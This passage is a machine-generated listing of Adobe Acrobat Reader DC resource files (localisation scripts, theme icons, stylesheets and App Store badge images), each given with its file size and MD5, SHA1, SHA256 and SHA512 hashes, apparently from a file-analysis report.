                                                                                                                                                                                                                                                  0ac92305b351c0168d57160e5328dfc8c2cf3db283305cb41b443ea4dba659701b7ea0dd9552f66f3b8b6da0289486988ee001d7598f526cdce59d60fc082fbc

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  99a8eb753353bcdcd2558955e20c9db4

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  b911e1da8d82cd467c064229f35263f8d85cb72e

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  71c8b030483b08514c3905f8484bb980860cbbec402970551db7e853e818dcac

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  1a460a4d19fe905b7db2850389edec1bd53f223c4de57da0cd12f501a1a116e44d9afea16c14cdd94088c5b32a19c3d98e8068cc56b57e41df4dc2968cdc8b8b

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-ma\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  92765d1856b55715600897036ad13e57

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  ef64320a0f60244a09c2f4b080a7912f963cc45a

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  79a3e6d6d7d9970bd701172e96f2f3809023b86e46d7370664f83caee7aa23f9

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  45faca99454e36625eb8d56cd861ecd1dcfd340fc64dff1af499eb890fdb0b2aa2619e7aba7da362d197d381829005dfbbfc7b9190a2ef8d7315391cc6a276d6

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\icons.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  74ae7f7ef284bd97c1d8d019e60bc14e

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  19601aba28ee7fadddcb439f67b18a7e60691a3e

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  49877af1be7c1d04debe48a1f86197219d182db55bcc017dd4120ef000769429

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  f9a5dc5247751437fa164e7fb331923c5e0bdfbc5ac264bce4135b97d3202ca2312b78ab80f60d9e3cc5952e77e5ec2b04af06932e57a225ebc6ffae791ef47a

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\icons_ie8.gif

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  12e18f92e6b61cd507e3e35e3cd55a34

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  a023383a39ec8df800557d96f0178171e91ce4ea

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  853c0b7e6561193e8684149d92b037fbc217141780f667fe58df705354b06058

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  67691242a68b159befc910e9854d45866ba5d7997769d85f51cf331759cf87b8023e3bf00174a877ae594925b771ca83ca0a2324c4286b4cb6c031ad654b645f

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\icons_retina.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  15KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  abe0a899bb74510b21d607184ae68102

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  2e5fe9943e975c835112ea145d1830f3dc1b66bb

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  d254c5bf875d7d9d2d564751ae4c66c53eac5048bf0df2785728a8a2af687e1b

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  f8e60ed9d2fdd9cc5863549e5ef1b783106b5898cd7848a1cad69065e2c8a59efb256c0853b2eeef441f30f1415d500b33bb9d4c5a419d881fd33340e6409598

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\new_icons.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  17939168cf5df95dbb56e8bcba0452a2

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  7e2903eb9040d2c71caff1da003cdd75aa429e2e

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  624c578f1a61b0588b917303c28855c89d73008c9117a38d0996e0b2283672d2

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  023a70c27aba64ac78e787b710f146b8676111c9e358b16bceac61608035c7dbca427a6135b31d81c3e075391cfb5f7618c421ea2787eaca57c85a724f0e4202

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\new_icons_retina.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  17KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  3785b5dc988ef9db355da547c9d2048a

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  cd8b4853eb3ced09497ac053040f20f9df52939a

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  f6fa538a08db0cee88847c51abc43eaa294a85fd6a5212007f8416da16285b55

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  c578903ad80e70b7752eb0606db34c8076e841fd525bf1f18035d4e24ad1f3e27a152f6fcf4f9dc4e230363e0179e5130fe94ac859560564be1928dcffde1e3b

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-gb\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  0de8d5e28b1140433867eabf936ad163

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  11be18af980c2909592bd6055f0de854fbd6de7d

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  d9ddaf14f0f3bcb8be5392cd00beba2689cd9a9b77f013ac242392f6f4216d7f

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  83e9082b3bd1e43a817a59a16307b3c682a811c8e195a824b1cb1c42dd0b8bd5565d39bd2ed0248219422a0437976aeb81276a9e060cd76ad90eba78b837708c

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  3f759308949f126aed2661a454b53214

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  18deb771fb2537eefd8f0c73ed31fdd44bfdae23

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  315c4e13753bb823445054574027bce4a8ba17ef96cf2fc9366f60af2620ace8

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  605c84f202486cbd390be0683760c40e96eac7b5bd1d85a45aaeb1f77ed51b05d15b0fc7c0534c599eb9cb50915335efebd0969af2bc2664bfa7bc0b1a39891f

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  cef84f0f050296f22e7946ce5efbf093

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  4ed59da6b0f0ca783e0872469fd3fcd8e157029c

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  2050dd7092e903649b1090d35e16f17dab21519de8fd4866738f12229e2479d6

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  eb71578647f0150251d813720a8c20b225f46f878a5b48b970bd4cef7759495a759cfe3bc674378c0040d3bd4b3a49cab6a045a92a3bbeca4113f96bce8b1a81

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  700B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  a3337b001651bf000efb7cb00dd86a61

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  404f99d8d38dc585e65144dd37ac300a49989fcb

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  4439cd13741a357e3537528c12b145903cdc75a1d34c774a3479e9e199ac9d61

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  d124984672d01a86148d918e9d2abedf69595d3d159a1f80da8b579fecc2a150428013174215b864c54c1a369d43f8d4f3837d728e11275920cd42a10bae5d11

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_patterns_header.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  43cbd46a27a2cfea7c36704c82eb0838

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  20e3f63c3d2f538f8fd62f4967490e5bfc65b117

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  76699e9efffa7116d3e15cb0137dc379deaeba93281bf29df77f9f5c5ee45349

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  fa47c2e1d70d557b4d1a45f4e56f5074116baf0c31530375960273c2c0ded1a5cd66b4789e40f7c47c9a39fda861ca6e065c2f604c975db193d39b56a2b3b8e6

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  9KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  1a2fb3f3e1e1e78f2d651ab239bf2353

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  d1d720b59937f628f6f2b17271d240ab8f401d92

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  4b02b4ded4cb3e0db91f7374b107ec5650d38f88d4140aee7c0336dbc286bc93

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  b0a74506ddb8de67fa525e71310cc155755fd2010bbdc29bdbf16e32c45f48b5b6f297f89c659e6dc8c65cae2444a15897daf3ef3da059676d78909e259675ec

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations_retina.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  19KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  39cbe7683c930ae6bbd3f53be1460346

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  a79653339850307cc62cdd2bd0071f27792d7b6e

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  9928a70946b7e5a06212ef6f51619f9ceab3b5cacb942e042b12bd16f9dd5b71

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  d913a2bdba3c36ffb8bdcdf27557ba4d88987d1728291e902c3e32dfcdf4a9fdb7d0b1fb4a6e3ac90d446a0dec8586eff4e2fafd87262dd34355854c6a081c81

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  93ca64d97cf25affadfc861c54fca0f5

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  75e2340d1d8cbf174f2a4f3788be302e8493df04

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  7307ea6cd6d9f0395e0c696de7d4270a2068050c8c024ef8a56dd83e573d4f65

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  b72d40565071762bdd5d00b244c1e8721dd5a3aba7751835955da7bc495102b8764210c859500fe05e3ea47426374d31910e08b83bf3ccaca9bc6a78b865493e

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  6a027c2723bf66b2f9d52dafeb36d497

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  822ba0bfa724793781b662f6819baf19c56bf189

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  f1d58b7f57a1f71abf684454bfbff45c291391756ba3dd35273c4e45ecebc57d

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  1e276300e5fd729c57d367e3e8ef676e1541db27d209a27d5af2f460f2b1efbac68c3de2d897eb7dba17eece84e9fbbb22067ebd3152f358fb0ea5584e42becc

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\main-selector.css

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  b30c660ecb3b7ccf1a97251cfc7b6135

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  d48cf26ccd9dec144568b815c6e4418ad211e920

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  66fba57f8d425264d0606bf62898b39c16d4349572c1a080ac0daa547e639cb9

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  1f60a79b9a1e6f27b1aa0f636d060c3f7b0de6d4722f1d0da161fb061fddd40b84f9f83992a399d735d0b8cbbca0562189e019cdb5d384754fb075fd70245e63

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  25566c5772d0d043d15ffe59f6706f3d

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  3f21c471ccba240c8092071b2931cbadd9a4daae

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  5a3e5efa7d144e89d18e1e1e15b41808c5b6d08a5840562e30ffa70ee586a41f

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  bd9fb71435ff48d2131e5cfb07fb1120e373d7639a82f9054bb266c37f05b3307962795e90c831c785da6480c4f2543333cc661dd3fdf8abcf451924a5ea741f

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  88eaf92bcc533485422c6f08aa53618d

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  8cd36f1aef333228ca008abe8ad9e572aa558969

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  185166ee618df7f48f4411a393398422fdd516ce5a27853c12c52aa3f6c42c0f

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  5c85c4f6cb99e69e780c7932cc342f7127daa005812681cb385b62ac59058871b55628adbad74189b834725c4f993278e0c9369ed37914709d47b2ea2e8148aa

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  1945b62efc915c3a34e6f07cbbc52968

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  5cce73fc09845d682c579c5c604e37dc36fe1606

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  eb02d1f573d108fcaa9dc0f497a835bb91d626954ae1211b102a8a15c5e62544

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  9502653a82bde0aec3eeb6ff19cf240443ff35517bb0568731f048b242a28c77169e4a52bd612e32237a6c4dddff508c0098ad1b870f92c7864ec2eca573a402

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  5KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  a716f7b3edaf8356347dfba09fe66d23

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  30e0e6c12044e3fa09ca3e89278082003e9c0c67

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  15ab732bcbfa0e0141e7cc8980367d45d04306fd3d354987cb627694682e5eb6

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  1617d4f19571517afd5627d68b00cdf0f6ab129492b8ca62cae67a602ebb03c886c6d80d23970282370f8cc1ca3894d24812e4ec817132c2e115dcd30e609e14

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\en_get.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  5KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  10728214d1efc70b32414187c59f28aa

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  1f2f30520d9b7fac2d0cc896578ffc40c59bbce8

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  7415229ceecdf171e20eeaf02c343362e37ada48a57a35615fef290ccd201063

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  00c6b5b7bfc81fb4efa5998ed21aa97ad6846fe4a3ef2c29629e4be88136c2fb154d9beda973831124a7a7dcd4829e9b1ee3bc3f9c755b5276713a2baf502863

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  13KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  84b48cbcbacdacf65a5d52fa31d1c597

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  cbafef5361793c0e978cb38a15677384fc6c8dc0

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  e1da2a9d4a5c0c2a804c1e5fc5dae2a31bee3c2edde0f5d77d4bae993bd2007f

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  3dcc69cabcc9e6ba7678d905c6a5d239005b3145c2d4eef2dad1d070df9db178bdb85068a7032196c4156f7d407018f4412773c6721372ae7a2d4fa81e5f46ab

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  14KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  bc4a9bbf5b66eea73b00928c85e4708c

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  11152baf1abded443e0fb6f13a48884424758c3c

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  e2e33c7d1611f242d1dbe190c5ad535f849a6b792bc697d6985d158a7def5423

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  274dbb2aa0dd1d25f4c1ed42a860f32cee9ffdb7780b6fe552edbe87335f8e5a310d4f60d43ebcaf6a11669dcaf60cce639e618c52af536d8a5b8e3f6dabead0

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  df431ac3442c236dd3b63d9c63c77fe4

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  5324795df7171726d154389f4e5edcb7ec41e387

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  1c6cb0a55b2d14d48b422b2ccba22407c90aabf47577e852c9e5ee553e1857a4

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  7d48d03086a15d1d90ea7f61a282e4abe6f925e476292bc1a9e0fc680089fc737143b549a2543226086bcc419de3a798ae16cc2765abccaeb26987d4a4be15ca

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\css\main-selector.css

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  238df551b9a77883ca0c640db0a86c5c

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  af6ff0db369f086cb3ecc178c1a3d5fdcdaaf715

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  adb46fed4f22920ce94e19cdfeec5874f56da840c9e9ddddb78ac060fb336121

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  cf06d35779b16f9b601120a3bd4c76bd0534d861613206d7d45a4c319de8437c29951f61d67ceac70600f4f456124ec4f91fbf1e680faccae232aaacee008aea

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_cs_135x40.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  19KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  2dc649a14b89bce76f179cedce30594a

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  f746fb27ac8a867def39710c884f72e18e5af6da

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  ac1f13052262802167f5aee53c868c354abaa26b959961bfa5546956c183aab2

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  98fa1cbab85ad83dd61ee6e0a53aaebb10d0e360032ee637c31238cbfb242d026d10fc5f8e961cabde8a59d4a9f17bd6e97c99cbe511e64fba760dde42953ef1

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_da_135x40.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  15KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  21b3280bd1a998b898fea38099a39a22

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  f24f054154ce874d3edc735ba21fd3938689ac72

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  845c0b7efaeffef899b5c2bd10b2f9312fe3579b0dfc55947159a11070da088d

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  d3da9524a85675451777dbf50a946afda0041a57917f107ecc35575c413fe50e9eee797e9f468e9b8a7df52aff4c013c66f827c40fa83fe3e18f2c4f2f789212

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_de_135x40.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  18KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  6612fe98bc0140e1d46b5e8865fe2177

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  f1a338c8403ad7172ca9c7cba8dcb4328acf7e07

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  5ab193ca4e685bce5b7da290e59293b77d3f3486e76176219e1a8b14ed0aa481

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  6329cb8c393165cfd24048be47ba9c91c44689afd133b52116b54272686d20dcfbdcdf3fabdeb82716c9b1f690197e09a96cf6206113752fbb37f08478aac128

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_es_135x40.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  23KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  e71fc9b41b48276a66b5c9f42893d259

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  3db271baad717937b669160287f2aa75ecd5deeb

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  de6e33d4fe5b63271d035a5179ea0e2b09c2ef82ea2e7fc9c135f89676582c52

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  c6242bd0ef46279e21cfa8a1a3671832801b72c5f8fd0f6e617bfa9f4f329d31c27516b737542a853b4090aac1b9921796b004d572a4f66ade8056f7f1f5c788

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_fi_135x40.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  18KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  17186b4706dd9dea80db57842b1db9dd

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  6e9f2314a6db11cf674d438a76eb711b9fae1046

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  cb2489d471ccd4ae1864e65c84f00c5a6262a8a4e9937ad03a9d56d60eb6a030

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  6d80f4261d1a0221792ce8b586ebb9f694cbb9298ede7b7da965daf851c9ed36c130dc686cba3258c1d38cf7c32ba58598bf0d749f594c2963b89f99c3cedd83

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_fr_135x40.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  26KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  9a964dfcb89f7d6010f6d8c3e3a165df

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  ac06272fa8eafecb6002048caf88bcb29b573935

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  d5271b8fdc63a80a403aa1c28a393f19a77fe852e396436540d00a0687e13835

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  7dc770f43451fae60a323db8455fca970b92008e440befb727dba6960e419043ebbe20bab97080273e72428ff92d006091f0b638712420508d74bfdbe0cece44

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_it_135x40.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  20KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  f6e6ee8b0e355fb835a1d31908047cef

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  a6fcb0a3466e48bd4c66e277b39a61fd247b747d

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  3c7ec7518486a2e7651288a9d86f0884ff3b7183d575441d71d04d30e70c1251

                                                                                                                                                                                                                                                  SHA512

